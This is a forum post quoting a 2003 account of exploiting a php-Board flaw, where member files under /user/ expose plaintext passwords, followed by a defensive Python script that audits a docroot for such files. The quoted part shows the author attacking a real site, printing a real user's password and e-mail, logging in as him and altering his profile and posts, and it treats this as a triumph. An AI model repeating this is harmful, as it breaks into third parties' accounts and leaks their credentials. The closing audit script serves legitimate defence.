Here is another sample... The admin has fixed this problem... just to show how easy it is to exploit this issue.

QUOTE
php-Board exploit  

15/3/2003

by ComSec    

Just tested a php-Board (PHP) exploit released Feb 15 2003.

details:

http://www.securityfocus.com/archive/1/312...12/2003-02-18/0

exploit:
http://[target]/user/[NICKNAME].txt

Analysis of exploit:

did a search for: /forum/board.php?board=1

and selected as a target http://mitglied.lycos.de/smaragdenstadt/fo...forum/index.php

selected a user http://mitglied.lycos.de/smaragdenstadt/fo.../user/korsi.txt

result:1hoffesten#korsiv@t-online.de#http://www.dvu-pornstars.de#20.08.2002 12:22:30#2##

I assumed: 1hoffesten... was the password

so login= korsi
password=1hoffesten

*bingo*

changed his pornsite address


Also gave a mention in a thread... as admin

ComSec

<<<<<<<<<<<<<<<<<<<<<<<<<<<<
¤ ¤ ¥ < Action Deny all > ¥ ¤ ¤
>>>>>>>>>>>>>>>>>>>>>>>>>>>>
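For anyone running a flat-file board, here is an added example (not part of the quoted post and not php-Board code) that audits a local document root for `user/*.txt` files holding records like the one shown above. The field layout (password first, e-mail second) is inferred from that single record, the Apache-style `.htaccess` check and all function names are assumptions, and the sample data is constructed.

```python
import os
import re
import tempfile

EMAIL = re.compile(r"^[^@\s#]+@[^@\s#]+\.[^@\s#]+$")
DENY = re.compile(r"deny\s+from\s+all|require\s+all\s+denied", re.I)

def looks_like_user_record(line):
    """Heuristic for the '#'-separated record in the post (layout assumed):
    field 0 = password, field 1 = e-mail address, then further fields."""
    fields = line.rstrip("\r\n").split("#")
    return len(fields) >= 5 and fields[0] != "" and bool(EMAIL.match(fields[1]))

def dir_denies_access(dirpath):
    """True if the directory has an .htaccess with a deny-all rule (Apache assumed)."""
    htaccess = os.path.join(dirpath, ".htaccess")
    if not os.path.isfile(htaccess):
        return False
    with open(htaccess, encoding="latin-1") as fh:
        return bool(DENY.search(fh.read()))

def audit_docroot(docroot):
    """Return [(url_path, protected)] for credential-like user/*.txt files.
    The password field itself is never returned or printed."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        if os.path.basename(dirpath) != "user":
            continue
        protected = dir_denies_access(dirpath)
        for name in sorted(f for f in files if f.endswith(".txt")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                first_line = fh.readline()
            if looks_like_user_record(first_line):
                rel = os.path.relpath(path, docroot).replace(os.sep, "/")
                findings.append(("/" + rel, protected))
    return findings

def build_constructed_docroot():
    """Constructed sample tree: one credential-like file, one harmless file."""
    root = tempfile.mkdtemp()
    user_dir = os.path.join(root, "forum", "user")
    os.makedirs(user_dir)
    with open(os.path.join(user_dir, "alice.txt"), "w") as fh:
        fh.write("example-pw#alice@example.org#http://example.org#01.01.2003 10:00:00#1##\n")
    with open(os.path.join(user_dir, "readme.txt"), "w") as fh:
        fh.write("This directory holds member files.\n")
    return root

if __name__ == "__main__":
    for url_path, protected in audit_docroot(build_constructed_docroot()):
        print(url_path, "deny rule present" if protected else "SERVED IN CLEAR TEXT")
```

A deny rule only hides the file from the web server; the durable fix is to keep such records outside the document root and store password hashes rather than plaintext.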